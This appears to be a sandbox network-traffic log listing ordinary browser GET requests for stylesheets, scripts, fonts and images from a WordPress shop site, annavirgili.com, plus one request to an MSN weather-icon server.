        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/enjoy-instagram-instagram-responsive-images-gallery-and-carousel/assets/css/animate.min.css?ver=6.2.2 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce/assets/css/select2.css?ver=6.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/css/theme.css?ver=1.0.8 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/vendors/js-offcanvas/js-offcanvas.css?ver=1.2.9 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/css/customize.css?ver=1.0.8 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/css/main_color.css?ver=1.0.8 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/css/body_color.css?ver=1.0.8 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/ciena/assets/vendors/swiper/swiper.css?ver=5.3.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver=5.15.3 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15.3 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-brands-400.woff2 HTTP/1.1Host: annavirgili.comConnection: keep-aliveOrigin: https://annavirgili.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15.3Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/assets/dummy.png HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/flags/16/it.png HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/09/logo.pnbianco.png HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/08/logo.png HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/10/Progetto-senza-titolo-2024-09-04T092536.181.png HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/css/ion.rangeSlider.css?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/assets/dummy.png HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/10/Home-3-1.jpg HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/gtranslate/flags/16/it.png HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/09/logo.pnbianco.png HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/08/logo.png HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/tooltip/css/tooltipster.bundle.min.css?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/10/Progetto-senza-titolo-2024-09-04T092536.181.png HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/woocommerce-products-filter/js/tooltip/css/plugins/tooltipster/sideTip/themes/tooltipster-sideTip-noir.min.css?ver=3.3.0 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/10/Home-3-1.jpg HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/03/LOGO-NEERO-X-SITO_Tavola-disegno-1-1.png HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/elementor/css/post-8052462574847.css?ver=1725434764 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/fami-templatekits/assets/css/fmtpl-menu.css?ver=1.0.4 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.6.1 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.5.4 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.9.6 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.9.6 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/03/LOGO-NEERO-X-SITO_Tavola-disegno-1-1.png HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/effect.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.13.3 HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd
        Source: global trafficHTTP traffic detected: GET /weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/AAehwh2.png HTTP/1.1Accept: */*Accept-Language: en-CH,en-US;q=0.7,en;q=0.3UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: assets.msn.comConnection: Keep-Alive
